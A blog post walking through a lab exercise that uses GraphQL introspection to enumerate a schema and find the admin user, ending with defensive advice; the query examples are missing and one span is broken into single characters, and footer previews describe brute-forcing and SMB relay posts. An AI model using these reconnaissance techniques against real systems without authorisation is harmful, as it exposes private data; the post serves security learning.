Exploring A01: Broken Access Control – GraphQL Introspection Misconfiguration

 While working on A01: Broken Access Control from the OWASP Top 10, I came across an interesting security misconfiguration involving GraphQL introspection.

Objective:

Through using the GraphQL introspection feature, discover the user that has the “isAdmin” privileges.

Background

By default, GraphQL does not provide built-in authentication or authorization. This means developers must manually implement proper access controls. If not done correctly, attackers can perform unrestricted queries and access sensitive data.

Reconnaissance 

Upon visiting the application URL, I found several posts published by two users — this gave me a hint that user data was accessible through GraphQL queries.

 

Exploitation 

To better understand the backend structure, I used the GraphiQL interface to explore available queries.
Accessing the endpoint:



 i queried  the generic __schema using 


The application gives us interesting Types. Let's explore the User Object one. If we build a more complex query we can ask for more information, exploring every field available. Let's send the following:



We can see that there is an interesting field isAdmin, that we can use to find out who is the admin of the application.

Now we just need to query all the Users. To do that, let's see if there is a query available. We can use the following syntax:


That will give us the allUsers query. Now we need to understand what are the fields. We can do that in different ways, using GraphiQL or doing some more introspection. In this case we use GraphiQL, sending the following query


Finally we found a user that's the admin which is the scope of the lab.

Conclusion

This exercise highlights how improper GraphQL configuration can expose sensitive application data.
Disabling introspection in production and implementing strict authentication and authorization checks are essential to prevent data leaks through GraphQL endpoints.

๐Ÿ”’ Key Takeaways

  • Always disable introspection in production.

  • Implement authentication and authorization for all queries.

  • Use schema whitelisting to limit exposed fields.

  • Regularly perform security testing on APIs.



t
o
se
n
d
q
u
e
r
i
e
s
t
o
t
h
e
b
a
cke
n
d
a
n
d
d
i
sco
ve
r
w
h
a
t
i
s
a
va
i
l
a
b
l
e
.
G
o
t
o
h
t
t
p
:
/
/
0
.
0
.
0
.
0
:
5
0
0
0
/
g
r
a
p
h
q
l
.
W
e
ca
n
q
u
e
r
y
t
h
e
g
e
n
e
r
i
c
_
_
s
c
h
e
m
a
u
si
n
g
:

Comments

Post a Comment

Popular posts from this blog

Using Hydra to Brute-Force SSH And WI-Fi Login Portal

Image
  Welcome back again to my cybersecurity blog! i'm Basit Hassan, a student penetration tester passionate about ethical hack ing. On this blog, i'll be sharing tutorials, walkthroughs, and real-world exploitation techniques  that i've personally tested and can get you started in the penetration testing field. Today's post, i'll demonstrate how to use Hydra , a powerful brute-forcing tool, to test login credentials on a SSH server and a WI-FI admin portal. This test was done on my own network and machine to show how attackers operate and how to protect against them. What is Hydra? Hydra is a powerful tool used by penetration testers to automate brute-force attacks on various protocols like SSH, FTP, HTTP, and more. In this blog, we’ll learn how to use Hydra to brute-force SSH logins and web-based login forms safely in a lab environment. ๐Ÿ”“ What is a Brute-Force Attack? A brute-force attack is a method use to gain unauthorized access to account and systems by trying co...
Read more

Discover AWS Organization ID Via S3 Bucket

Image
  Welcome to my cybersecurity blog! i'm Basit Hassan, a student penetration tester passionate about ethical hack ing. On this blog, i'll be sharing tutorials, walkthroughs, and real-world exploitation techniques  that i've personally tested and can get you started in the penetration testing field. Today's post is about AWS pentesting using an assume breached scenario, where the target  organization provide you with low level credentials,command line interface credentials that you can connect to the AWS CLI (Command Line Interface) with.  Let The Hacking Begin!!!! we will be using platform called CYBR click on the url and create a free account and do this lab along side with me  https://cybr.com/hands-on-labs/lab/discover-aws-organization-id-via-s3-bucket/  this is how the interface looks like below ๐Ÿ‘‡๐Ÿ‘‡after creating  an account and starting the lab  once it's ready you are going to get an Access key ID and a Secret Access key. So now if you are n...
Read more

SMB Relay Attack in AD Lab (Step-by-Step)

Image
Welcome back again to my cybersecurity blog! I'm Basit Hassan, a Vulnerability Assessment and Penetration Tester passionate about ethical hacking. On this blog, I’ll be sharing tutorials, walkthroughs, and real-world exploitation techniques that I’ve personally tested all designed to help you get started and grow in the penetration testing field. Today’s post , I’ll demonstrate how I leveraged SMB Relay attacks in my Active Directory lab to understand how attackers exploit network misconfigurations and relay authentication requests. This simulation was done in my own isolated lab environment to show how these attacks work  and more importantly, how to secure your network against them.  What is an SMB Relay Attack? SMB Relay is a man-in-the-middle (MITM) attack technique where an attacker intercepts and relays authentication requests from one system to another, without cracking any password. Instead of capturing and brute-forcing hashes, SMB Relay forwards the authenticatio...
Read more